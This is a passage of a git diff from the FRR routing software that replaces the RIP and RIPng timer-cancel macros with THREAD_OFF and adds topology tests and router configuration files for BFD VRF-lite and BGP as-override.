- RIP_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
thread_add_timer(master, rip_timeout, rinfo, rip->timeout_time,
&rinfo->t_timeout);
}
@@ -659,8 +659,8 @@ static void rip_rte_process(struct rte *rte, struct sockaddr_in *from,
assert(newinfo.metric
!= RIP_METRIC_INFINITY);
- RIP_TIMER_OFF(rinfo->t_timeout);
- RIP_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
memcpy(rinfo, &newinfo,
sizeof(struct rip_info));
rip_timeout_update(rip, rinfo);
@@ -1614,7 +1614,7 @@ void rip_redistribute_delete(struct rip *rip, int type, int sub_type,
RIP_TIMER_ON(rinfo->t_garbage_collect,
rip_garbage_collect,
rip->garbage_time);
- RIP_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
rinfo->flags |= RIP_RTF_CHANGED;
if (IS_RIP_DEBUG_EVENT)
@@ -2506,7 +2506,7 @@ static void rip_update(struct thread *t)
/* Triggered updates may be suppressed if a regular update is due by
the time the triggered update would be sent. */
- RIP_TIMER_OFF(rip->t_triggered_interval);
+ THREAD_OFF(rip->t_triggered_interval);
rip->trigger = 0;
/* Register myself. */
@@ -2553,7 +2553,7 @@ static void rip_triggered_update(struct thread *t)
int interval;
/* Cancel interval timer. */
- RIP_TIMER_OFF(rip->t_triggered_interval);
+ THREAD_OFF(rip->t_triggered_interval);
rip->trigger = 0;
/* Logging triggered update. */
@@ -2603,7 +2603,7 @@ void rip_redistribute_withdraw(struct rip *rip, int type)
rinfo->metric = RIP_METRIC_INFINITY;
RIP_TIMER_ON(rinfo->t_garbage_collect, rip_garbage_collect,
rip->garbage_time);
- RIP_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
rinfo->flags |= RIP_RTF_CHANGED;
if (IS_RIP_DEBUG_EVENT) {
@@ -2785,7 +2785,7 @@ void rip_event(struct rip *rip, enum rip_event event, int sock)
thread_add_read(master, rip_read, rip, sock, &rip->t_read);
break;
case RIP_UPDATE_EVENT:
- RIP_TIMER_OFF(rip->t_update);
+ THREAD_OFF(rip->t_update);
jitter = rip_update_jitter(rip->update_time);
thread_add_timer(master, rip_update, rip,
sock ? 2 : rip->update_time + jitter,
@@ -2915,8 +2915,8 @@ void rip_ecmp_disable(struct rip *rip)
if (tmp_rinfo == rinfo)
continue;
- RIP_TIMER_OFF(tmp_rinfo->t_timeout);
- RIP_TIMER_OFF(tmp_rinfo->t_garbage_collect);
+ THREAD_OFF(tmp_rinfo->t_timeout);
+ THREAD_OFF(tmp_rinfo->t_garbage_collect);
list_delete_node(list, node);
rip_info_free(tmp_rinfo);
}
@@ -3508,8 +3508,8 @@ static void rip_instance_disable(struct rip *rip)
rip_zebra_ipv4_delete(rip, rp);
for (ALL_LIST_ELEMENTS_RO(list, listnode, rinfo)) {
- RIP_TIMER_OFF(rinfo->t_timeout);
- RIP_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
rip_info_free(rinfo);
}
list_delete(&list);
@@ -3521,12 +3521,12 @@ static void rip_instance_disable(struct rip *rip)
rip_redistribute_disable(rip);
/* Cancel RIP related timers. */
- RIP_TIMER_OFF(rip->t_update);
- RIP_TIMER_OFF(rip->t_triggered_update);
- RIP_TIMER_OFF(rip->t_triggered_interval);
+ THREAD_OFF(rip->t_update);
+ THREAD_OFF(rip->t_triggered_update);
+ THREAD_OFF(rip->t_triggered_interval);
/* Cancel read thread. */
- thread_cancel(&rip->t_read);
+ THREAD_OFF(rip->t_read);
/* Close RIP socket. */
close(rip->sock);
diff --git a/ripd/ripd.h b/ripd/ripd.h
index f26dcd8775..d26592dac2 100644
--- a/ripd/ripd.h
+++ b/ripd/ripd.h
@@ -404,9 +404,6 @@ enum rip_event {
/* Macro for timer turn on. */
#define RIP_TIMER_ON(T,F,V) thread_add_timer (master, (F), rinfo, (V), &(T))
-/* Macro for timer turn off. */
-#define RIP_TIMER_OFF(X) thread_cancel(&(X))
-
#define RIP_OFFSET_LIST_IN 0
#define RIP_OFFSET_LIST_OUT 1
#define RIP_OFFSET_LIST_MAX 2
diff --git a/ripngd/ripng_interface.c b/ripngd/ripng_interface.c
index 5159a9825b..3068d04b73 100644
--- a/ripngd/ripng_interface.c
+++ b/ripngd/ripng_interface.c
@@ -316,7 +316,7 @@ void ripng_interface_clean(struct ripng *ripng)
ri->enable_interface = 0;
ri->running = 0;
- thread_cancel(&ri->t_wakeup);
+ THREAD_OFF(ri->t_wakeup);
}
}
diff --git a/ripngd/ripng_nb_rpcs.c b/ripngd/ripng_nb_rpcs.c
index 4dfe9d9640..57a5f26688 100644
--- a/ripngd/ripng_nb_rpcs.c
+++ b/ripngd/ripng_nb_rpcs.c
@@ -66,8 +66,8 @@ static void clear_ripng_route(struct ripng *ripng)
}
if (rinfo) {
- RIPNG_TIMER_OFF(rinfo->t_timeout);
- RIPNG_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
listnode_delete(list, rinfo);
ripng_info_free(rinfo);
}
diff --git a/ripngd/ripng_peer.c b/ripngd/ripng_peer.c
index 010fdda89e..37cfe9833f 100644
--- a/ripngd/ripng_peer.c
+++ b/ripngd/ripng_peer.c
@@ -43,7 +43,7 @@ static struct ripng_peer *ripng_peer_new(void)
static void ripng_peer_free(struct ripng_peer *peer)
{
- RIPNG_TIMER_OFF(peer->t_timeout);
+ THREAD_OFF(peer->t_timeout);
XFREE(MTYPE_RIPNG_PEER, peer);
}
@@ -93,7 +93,7 @@ static struct ripng_peer *ripng_peer_get(struct ripng *ripng,
peer = ripng_peer_lookup(ripng, addr);
if (peer) {
- thread_cancel(&peer->t_timeout);
+ THREAD_OFF(peer->t_timeout);
} else {
peer = ripng_peer_new();
peer->ripng = ripng;
diff --git a/ripngd/ripngd.c b/ripngd/ripngd.c
index e7d2928697..1e7a13d7dc 100644
--- a/ripngd/ripngd.c
+++ b/ripngd/ripngd.c
@@ -431,7 +431,7 @@ static void ripng_garbage_collect(struct thread *t)
rinfo = THREAD_ARG(t);
/* Off timeout timer. */
- RIPNG_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
/* Get route_node pointer. */
rp = rinfo->rp;
@@ -518,14 +518,14 @@ struct ripng_info *ripng_ecmp_replace(struct ripng *ripng,
/* Re-use the first entry, and delete the others. */
for (ALL_LIST_ELEMENTS(list, node, nextnode, tmp_rinfo))
if (tmp_rinfo != rinfo) {
- RIPNG_TIMER_OFF(tmp_rinfo->t_timeout);
- RIPNG_TIMER_OFF(tmp_rinfo->t_garbage_collect);
+ THREAD_OFF(tmp_rinfo->t_timeout);
+ THREAD_OFF(tmp_rinfo->t_garbage_collect);
list_delete_node(list, node);
ripng_info_free(tmp_rinfo);
}
- RIPNG_TIMER_OFF(rinfo->t_timeout);
- RIPNG_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
memcpy(rinfo, rinfo_new, sizeof(struct ripng_info));
if (ripng_route_rte(rinfo)) {
@@ -557,7 +557,7 @@ struct ripng_info *ripng_ecmp_delete(struct ripng *ripng,
struct agg_node *rp = rinfo->rp;
struct list *list = (struct list *)rp->info;
- RIPNG_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
if (rinfo->metric != RIPNG_METRIC_INFINITY)
ripng_aggregate_decrement(rp, rinfo);
@@ -565,7 +565,7 @@ struct ripng_info *ripng_ecmp_delete(struct ripng *ripng,
if (listcount(list) > 1) {
/* Some other ECMP entries still exist. Just delete this entry.
*/
- RIPNG_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_garbage_collect);
listnode_delete(list, rinfo);
if (ripng_route_rte(rinfo)
&& CHECK_FLAG(rinfo->flags, RIPNG_RTF_FIB))
@@ -611,7 +611,7 @@ static void ripng_timeout(struct thread *t)
static void ripng_timeout_update(struct ripng *ripng, struct ripng_info *rinfo)
{
if (rinfo->metric != RIPNG_METRIC_INFINITY) {
- RIPNG_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
thread_add_timer(master, ripng_timeout, rinfo,
ripng->timeout_time, &rinfo->t_timeout);
}
@@ -1022,7 +1022,7 @@ void ripng_redistribute_delete(struct ripng *ripng, int type, int sub_type,
RIPNG_TIMER_ON(rinfo->t_garbage_collect,
ripng_garbage_collect,
ripng->garbage_time);
- RIPNG_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
/* Aggregate count decrement. */
ripng_aggregate_decrement(rp, rinfo);
@@ -1061,7 +1061,7 @@ void ripng_redistribute_withdraw(struct ripng *ripng, int type)
RIPNG_TIMER_ON(rinfo->t_garbage_collect,
ripng_garbage_collect,
ripng->garbage_time);
- RIPNG_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
/* Aggregate count decrement. */
ripng_aggregate_decrement(rp, rinfo);
@@ -1445,7 +1445,7 @@ static void ripng_update(struct thread *t)
/* Triggered updates may be suppressed if a regular update is due by
the time the triggered update would be sent. */
- thread_cancel(&ripng->t_triggered_interval);
+ THREAD_OFF(ripng->t_triggered_interval);
ripng->trigger = 0;
/* Reset flush event. */
@@ -1472,7 +1472,7 @@ void ripng_triggered_update(struct thread *t)
int interval;
/* Cancel interval timer. */
- thread_cancel(&ripng->t_triggered_interval);
+ THREAD_OFF(ripng->t_triggered_interval);
ripng->trigger = 0;
/* Logging triggered update. */
@@ -1917,7 +1917,7 @@ void ripng_event(struct ripng *ripng, enum ripng_event event, int sock)
&ripng->t_read);
break;
case RIPNG_UPDATE_EVENT:
- thread_cancel(&ripng->t_update);
+ THREAD_OFF(ripng->t_update);
/* Update timer jitter. */
jitter = ripng_update_jitter(ripng->update_time);
@@ -2209,8 +2209,8 @@ void ripng_ecmp_disable(struct ripng *ripng)
/* Drop all other entries, except the first one. */
for (ALL_LIST_ELEMENTS(list, node, nextnode, tmp_rinfo))
if (tmp_rinfo != rinfo) {
- RIPNG_TIMER_OFF(tmp_rinfo->t_timeout);
- RIPNG_TIMER_OFF(
+ THREAD_OFF(tmp_rinfo->t_timeout);
+ THREAD_OFF(
tmp_rinfo->t_garbage_collect);
list_delete_node(list, node);
ripng_info_free(tmp_rinfo);
@@ -2528,8 +2528,8 @@ static void ripng_instance_disable(struct ripng *ripng)
ripng_zebra_ipv6_delete(ripng, rp);
for (ALL_LIST_ELEMENTS_RO(list, listnode, rinfo)) {
- RIPNG_TIMER_OFF(rinfo->t_timeout);
- RIPNG_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
ripng_info_free(rinfo);
}
list_delete(&list);
@@ -2548,12 +2548,12 @@ static void ripng_instance_disable(struct ripng *ripng)
ripng_redistribute_disable(ripng);
/* Cancel the RIPng timers */
- RIPNG_TIMER_OFF(ripng->t_update);
- RIPNG_TIMER_OFF(ripng->t_triggered_update);
- RIPNG_TIMER_OFF(ripng->t_triggered_interval);
+ THREAD_OFF(ripng->t_update);
+ THREAD_OFF(ripng->t_triggered_update);
+ THREAD_OFF(ripng->t_triggered_interval);
/* Cancel the read thread */
- thread_cancel(&ripng->t_read);
+ THREAD_OFF(ripng->t_read);
/* Close the RIPng socket */
if (ripng->sock >= 0) {
diff --git a/ripngd/ripngd.h b/ripngd/ripngd.h
index 6bf687b02a..ac2edc5b2c 100644
--- a/ripngd/ripngd.h
+++ b/ripngd/ripngd.h
@@ -312,8 +312,6 @@ enum ripng_event {
/* RIPng timer on/off macro. */
#define RIPNG_TIMER_ON(T,F,V) thread_add_timer (master, (F), rinfo, (V), &(T))
-#define RIPNG_TIMER_OFF(T) thread_cancel(&(T))
-
#define RIPNG_OFFSET_LIST_IN 0
#define RIPNG_OFFSET_LIST_OUT 1
#define RIPNG_OFFSET_LIST_MAX 2
diff --git a/tests/topotests/bfd_vrflite_topo1/__init__.py b/tests/topotests/bfd_vrflite_topo1/__init__.py
new file mode 100644
index 0000000000..e69de29bb2
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/__init__.py
diff --git a/tests/topotests/bfd_vrflite_topo1/r1/bfd_peers_status.json b/tests/topotests/bfd_vrflite_topo1/r1/bfd_peers_status.json
new file mode 100644
index 0000000000..07e96d74bd
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/r1/bfd_peers_status.json
@@ -0,0 +1,96 @@
+[
+ {
+ "multihop":false,
+ "peer":"192.168.0.2",
+ "vrf":"vrf1",
+ "passive-mode":false,
+ "status":"up",
+ "diagnostic":"ok",
+ "remote-diagnostic":"ok",
+ "receive-interval":1000,
+ "transmit-interval":1000,
+ "echo-receive-interval":50,
+ "echo-transmit-interval":0,
+ "detect-multiplier":3,
+ "remote-receive-interval":1000,
+ "remote-transmit-interval":1000,
+ "remote-echo-receive-interval":50,
+ "remote-detect-multiplier":3
+ },
+ {
+ "multihop":true,
+ "peer":"192.0.2.2",
+ "local":"192.0.2.1",
+ "vrf":"vrf2",
+ "passive-mode":false,
+ "minimum-ttl":254,
+ "status":"up",
+ "diagnostic":"ok",
+ "remote-diagnostic":"ok",
+ "receive-interval":1000,
+ "transmit-interval":1000,
+ "echo-receive-interval":50,
+ "echo-transmit-interval":0,
+ "detect-multiplier":3,
+ "remote-receive-interval":1000,
+ "remote-transmit-interval":1000,
+ "remote-echo-receive-interval":50,
+ "remote-detect-multiplier":3
+ },
+ {
+ "multihop":false,
+ "peer":"192.168.0.2",
+ "vrf":"vrf2",
+ "passive-mode":false,
+ "status":"up",
+ "diagnostic":"ok",
+ "remote-diagnostic":"ok",
+ "receive-interval":1000,
+ "transmit-interval":1000,
+ "echo-receive-interval":50,
+ "echo-transmit-interval":0,
+ "detect-multiplier":3,
+ "remote-receive-interval":1000,
+ "remote-transmit-interval":1000,
+ "remote-echo-receive-interval":50,
+ "remote-detect-multiplier":3
+ },
+ {
+ "multihop":false,
+ "peer":"192.168.0.2",
+ "vrf":"default",
+ "passive-mode":false,
+ "status":"up",
+ "diagnostic":"ok",
+ "remote-diagnostic":"ok",
+ "receive-interval":1000,
+ "transmit-interval":1000,
+ "echo-receive-interval":50,
+ "echo-transmit-interval":0,
+ "detect-multiplier":3,
+ "remote-receive-interval":1000,
+ "remote-transmit-interval":1000,
+ "remote-echo-receive-interval":50,
+ "remote-detect-multiplier":3
+ },
+ {
+ "multihop":true,
+ "peer":"192.0.2.2",
+ "local":"192.0.2.1",
+ "vrf":"vrf1",
+ "passive-mode":false,
+ "minimum-ttl":254,
+ "status":"up",
+ "diagnostic":"ok",
+ "remote-diagnostic":"ok",
+ "receive-interval":1000,
+ "transmit-interval":1000,
+ "echo-receive-interval":50,
+ "echo-transmit-interval":0,
+ "detect-multiplier":3,
+ "remote-receive-interval":1000,
+ "remote-transmit-interval":1000,
+ "remote-echo-receive-interval":50,
+ "remote-detect-multiplier":3
+ }
+]
diff --git a/tests/topotests/bfd_vrflite_topo1/r1/bfdd.conf b/tests/topotests/bfd_vrflite_topo1/r1/bfdd.conf
new file mode 100644
index 0000000000..96e8ff4b12
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/r1/bfdd.conf
@@ -0,0 +1,26 @@
+!
+! debug bfd network
+! debug bfd peer
+! debug bfd zebra
+!
+bfd
+ peer 192.168.0.2 vrf vrf1
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.168.0.2 vrf vrf2
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.168.0.2
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.0.2.2 multihop local-address 192.0.2.1 vrf vrf1
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.0.2.2 multihop local-address 192.0.2.1 vrf vrf2
+ transmit-interval 1000
+ receive-interval 1000
+ !
\ No newline at end of file
diff --git a/tests/topotests/bfd_vrflite_topo1/r1/zebra.conf b/tests/topotests/bfd_vrflite_topo1/r1/zebra.conf
new file mode 100644
index 0000000000..ebb4e63be7
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/r1/zebra.conf
@@ -0,0 +1,24 @@
+vrf vrf1
+ ip route 192.0.2.2/32 192.168.0.2
+!
+vrf vrf2
+ ip route 192.0.2.2/32 192.168.0.2
+!
+interface r1-eth0 vrf vrf3
+ ip address 192.168.0.1/24
+!
+interface r1-eth0.100 vrf vrf1
+ ip address 192.168.0.1/24
+!
+interface r1-eth0.200 vrf vrf2
+ ip address 192.168.0.1/24
+!
+interface r1-eth0.300
+ ip address 192.168.0.1/24
+!
+interface r1-loop1 vrf vrf1
+ ip address 192.0.2.1/32
+!
+interface r1-loop2 vrf vrf2
+ ip address 192.0.2.1/32
+!
\ No newline at end of file
diff --git a/tests/topotests/bfd_vrflite_topo1/r2/bfdd.conf b/tests/topotests/bfd_vrflite_topo1/r2/bfdd.conf
new file mode 100644
index 0000000000..7b11a4785a
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/r2/bfdd.conf
@@ -0,0 +1,26 @@
+!
+! debug bfd network
+! debug bfd peer
+! debug bfd zebra
+!
+bfd
+ peer 192.168.0.1 vrf vrf1
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.168.0.1 vrf vrf2
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.168.0.1
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.0.2.1 multihop local-address 192.0.2.2 vrf vrf1
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.0.2.1 multihop local-address 192.0.2.2 vrf vrf2
+ transmit-interval 1000
+ receive-interval 1000
+ !
\ No newline at end of file
diff --git a/tests/topotests/bfd_vrflite_topo1/r2/zebra.conf b/tests/topotests/bfd_vrflite_topo1/r2/zebra.conf
new file mode 100644
index 0000000000..d8b996e9ed
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/r2/zebra.conf
@@ -0,0 +1,24 @@
+vrf vrf1
+ ip route 192.0.2.1/32 192.168.0.1
+!
+vrf vrf2
+ ip route 192.0.2.1/32 192.168.0.1
+!
+interface r2-eth0 vrf vrf3
+ ip address 192.168.0.2/24
+!
+interface r2-eth0.100 vrf vrf1
+ ip address 192.168.0.2/24
+!
+interface r2-eth0.200 vrf vrf2
+ ip address 192.168.0.2/24
+!
+interface r2-eth0.300
+ ip address 192.168.0.2/24
+!
+interface r2-loop1 vrf vrf1
+ ip address 192.0.2.2/32
+!
+interface r2-loop2 vrf vrf2
+ ip address 192.0.2.2/32
+!
\ No newline at end of file
diff --git a/tests/topotests/bfd_vrflite_topo1/test_bfd_vrflite_topo1.py b/tests/topotests/bfd_vrflite_topo1/test_bfd_vrflite_topo1.py
new file mode 100644
index 0000000000..b7afb8e3b9
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/test_bfd_vrflite_topo1.py
@@ -0,0 +1,153 @@
+#!/usr/bin/env python
+
+#
+# test_bfd_vrflite_topo1.py
+# Part of NetDEF Topology Tests
+#
+# Copyright (c) 2018 by
+# Network Device Education Foundation, Inc. ("NetDEF")
+# Copyright (c) 2022 by 6WIND
+#
+# Permission to use, copy, modify, and/or distribute this software
+# for any purpose with or without fee is hereby granted, provided
+# that the above copyright notice and this permission notice appear
+# in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND NETDEF DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NETDEF BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
+# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
+# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
+# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
+# OF THIS SOFTWARE.
+#
+
+"""
+test_bfd_vrflite_topo1.py: Test the FRR BFD daemon.
+"""
+
+import os
+import sys
+import json
+from functools import partial
+import pytest
+
+# Save the Current Working Directory to find configuration files.
+CWD = os.path.dirname(os.path.realpath(__file__))
+sys.path.append(os.path.join(CWD, "../"))
+
+# pylint: disable=C0413
+# Import topogen and topotest helpers
+from lib import topotest
+from lib.topogen import Topogen, TopoRouter, get_topogen
+from lib.topolog import logger
+
+# Required to instantiate the topology builder class.
+
+pytestmark = [pytest.mark.bfdd, pytest.mark.bgpd]
+
+
+def build_topo(tgen):
+ # Create 2 routers
+ for routern in range(1, 3):
+ tgen.add_router("r{}".format(routern))
+
+ switch = tgen.add_switch("s1")
+ switch.add_link(tgen.gears["r1"])
+ switch.add_link(tgen.gears["r2"])
+
+ switch = tgen.add_switch("s2")
+ switch.add_link(tgen.gears["r2"])
+
+ switch = tgen.add_switch("s3")
+ switch.add_link(tgen.gears["r1"])
+
+
+def setup_module(mod):
+ "Sets up the pytest environment"
+ tgen = Topogen(build_topo, mod.__name__)
+ tgen.start_topology()
+
+ router_list = tgen.routers()
+
+ logger.info("Testing with Linux VRF support and udp_l3mdev=0")
+ if os.system("echo 0 > /proc/sys/net/ipv4/udp_l3mdev_accept") != 0:
+ return pytest.skip(
+ "Skipping BFD vrflite Topo1 Test. Linux VRF not available on System"
+ )
+
+ for rname, router in router_list.items():
+ router.net.add_l3vrf("vrf1", 10)
+ router.net.add_l3vrf("vrf2", 20)
+ router.net.add_l3vrf("vrf3", 30)
+ router.net.add_vlan(rname + "-eth0.100", rname + "-eth0", 100)
+ router.net.add_vlan(rname + "-eth0.200", rname + "-eth0", 200)
+ router.net.add_vlan(rname + "-eth0.300", rname + "-eth0", 300)
+ router.net.attach_iface_to_l3vrf(rname + "-eth0.100", "vrf1")
+ router.net.attach_iface_to_l3vrf(rname + "-eth0.200", "vrf2")
+ router.net.add_loop(rname + "-loop1")
+ router.net.add_loop(rname + "-loop2")
+ router.net.attach_iface_to_l3vrf(rname + "-loop1", "vrf1")
+ router.net.attach_iface_to_l3vrf(rname + "-loop2", "vrf2")
+ router.net.attach_iface_to_l3vrf(rname + "-eth0", "vrf3")
+
+ for rname, router in router_list.items():
+ router.load_config(
+ TopoRouter.RD_ZEBRA,
+ os.path.join(CWD, "{}/zebra.conf".format(rname))
+ )
+ router.load_config(
+ TopoRouter.RD_BFD, os.path.join(CWD, "{}/bfdd.conf".format(rname))
+ )
+
+ # Initialize all routers.
+ tgen.start_router()
+
+
+def teardown_module(_mod):
+ "Teardown the pytest environment"
+ tgen = get_topogen()
+
+ # Move interfaces out of vrf namespace and delete the namespace
+ router_list = tgen.routers()
+ for rname, router in router_list.items():
+ router.net.del_iface(rname + "-eth0.100")
+ router.net.del_iface(rname + "-eth0.200")
+ router.net.del_iface(rname + "-eth0.300")
+ router.net.del_iface(rname + "-loop1")
+ router.net.del_iface(rname + "-loop2")
+
+ tgen.stop_topology()
+
+
+def test_bfd_connection():
+ "Assert that the BFD peers can find themselves."
+ tgen = get_topogen()
+ if tgen.routers_have_failure():
+ pytest.skip(tgen.errors)
+ logger.info("waiting for bfd peers to go up")
+ router = tgen.gears['r1']
+ json_file = "{}/{}/bfd_peers_status.json".format(CWD, 'r1')
+ expected = json.loads(open(json_file).read())
+
+ test_func = partial(
+ topotest.router_json_cmp, router, "show bfd peers json", expected
+ )
+ _, result = topotest.run_and_expect(test_func, None, count=16, wait=1)
+ assertmsg = '"{}" JSON output mismatches'.format(router.name)
+ assert result is None, assertmsg
+
+
+def test_memory_leak():
+ "Run the memory leak test and report results."
+ tgen = get_topogen()
+ if not tgen.is_memleak_enabled():
+ pytest.skip("Memory leak test/report is disabled")
+
+ tgen.report_memory_leaks()
+
+
+if __name__ == "__main__":
+ args = ["-s"] + sys.argv[1:]
+ sys.exit(pytest.main(args))
diff --git a/tests/topotests/bgp_as_override/__init__.py b/tests/topotests/bgp_as_override/__init__.py
new file mode 100644
index 0000000000..e69de29bb2
--- /dev/null
+++ b/tests/topotests/bgp_as_override/__init__.py
diff --git a/tests/topotests/bgp_as_override/r1/bgpd.conf b/tests/topotests/bgp_as_override/r1/bgpd.conf
new file mode 100644
index 0000000000..3cfb7a2c90
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r1/bgpd.conf
@@ -0,0 +1,10 @@
+!
+router bgp 65001
+ no bgp ebgp-requires-policy
+ neighbor 192.168.1.1 remote-as external
+ neighbor 192.168.1.1 timers 1 3
+ neighbor 192.168.1.1 timers connect 1
+ address-family ipv4
+ redistribute connected
+ exit-address-family
+!
diff --git a/tests/topotests/bgp_as_override/r1/zebra.conf b/tests/topotests/bgp_as_override/r1/zebra.conf
new file mode 100644
index 0000000000..63728eb5d5
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r1/zebra.conf
@@ -0,0 +1,9 @@
+!
+interface lo
+ ip address 172.16.255.1/32
+!
+interface r1-eth0
+ ip address 192.168.1.2/30
+!
+ip forwarding
+!
diff --git a/tests/topotests/bgp_as_override/r2/bgpd.conf b/tests/topotests/bgp_as_override/r2/bgpd.conf
new file mode 100644
index 0000000000..5e3b0c7f87
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r2/bgpd.conf
@@ -0,0 +1,10 @@
+!
+router bgp 65002
+ no bgp ebgp-requires-policy
+ neighbor 192.168.1.2 remote-as external
+ neighbor 192.168.1.2 timers 1 3
+ neighbor 192.168.1.2 timers connect 1
+ neighbor 192.168.2.2 remote-as external
+ neighbor 192.168.2.2 timers 1 3
+ neighbor 192.168.2.2 timers connect 1
+!
diff --git a/tests/topotests/bgp_as_override/r2/zebra.conf b/tests/topotests/bgp_as_override/r2/zebra.conf
new file mode 100644
index 0000000000..5bdfd02224
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r2/zebra.conf
@@ -0,0 +1,9 @@
+!
+interface r2-eth0
+ ip address 192.168.1.1/30
+!
+interface r2-eth1
+ ip address 192.168.2.1/30
+!
+ip forwarding
+!
diff --git a/tests/topotests/bgp_as_override/r3/bgpd.conf b/tests/topotests/bgp_as_override/r3/bgpd.conf
new file mode 100644
index 0000000000..6bbe56b678
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r3/bgpd.conf
@@ -0,0 +1,13 @@
+!
+router bgp 65003
+ no bgp ebgp-requires-policy
+ neighbor 192.168.2.1 remote-as external
+ neighbor 192.168.2.1 timers 1 3
+ neighbor 192.168.2.1 timers connect 1
+ neighbor 192.168.3.1 remote-as external
+ neighbor 192.168.3.1 timers 1 3
+ neighbor 192.168.3.1 timers connect 1
+ address-family ipv4 unicast
+ neighbor 192.168.3.1 as-override
+ exit-address-family
+!
diff --git a/tests/topotests/bgp_as_override/r3/zebra.conf b/tests/topotests/bgp_as_override/r3/zebra.conf
new file mode 100644
index 0000000000..77782be3a8
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r3/zebra.conf
@@ -0,0 +1,9 @@
+!
+interface r3-eth0
+ ip address 192.168.2.2/30
+!
+interface r3-eth1
+ ip address 192.168.3.2/30
+!
+ip forwarding
+!
diff --git a/tests/topotests/bgp_as_override/r4/bgpd.conf b/tests/topotests/bgp_as_override/r4/bgpd.conf
new file mode 100644
index 0000000000..1bdee0800a
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r4/bgpd.conf
@@ -0,0 +1,7 @@
+!
+router bgp 65001
+ no bgp ebgp-requires-policy
+ neighbor 192.168.3.2 remote-as external
+ neighbor 192.168.3.2 timers 1 3
+ neighbor 192.168.3.2 timers connect 1
+!
diff --git a/tests/topotests/bgp_as_override/r4/zebra.conf b/tests/topotests/bgp_as_override/r4/zebra.conf
new file mode 100644
index 0000000000..71dc595558
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r4/zebra.conf
@@ -0,0 +1,6 @@
+!
+interface r4-eth0
+ ip address 192.168.3.1/30
+!
+ip forwarding
+!
diff --git a/tests/topotests/bgp_as_override/test_bgp_as_override.py b/tests/topotests/bgp_as_override/test_bgp_as_override.py
new file mode 100644
index 0000000000..40085cd7ec
--- /dev/null
+++ b/tests/topotests/bgp_as_override/test_bgp_as_override.py
@@ -0,0 +1,122 @@
+#!/usr/bin/env python
+
+#
+# Copyright (c) 2022 by
+# Donatas Abraitis <donatas@opensourcerouting.org>
+#
+# Permission to use, copy, modify, and/or distribute this software
+# for any purpose with or without fee is hereby granted, provided
+# that the above copyright notice and this permission notice appear
+# in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND NETDEF DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NETDEF BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
+# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
+# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
+# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
+# OF THIS SOFTWARE.
+#
+
+"""
+"""
+
+import os
+import sys
+import json
+import pytest
+import functools
+
+CWD = os.path.dirname(os.path.realpath(__file__))
+sys.path.append(os.path.join(CWD, "../"))
+
+# pylint: disable=C0413
+from lib import topotest
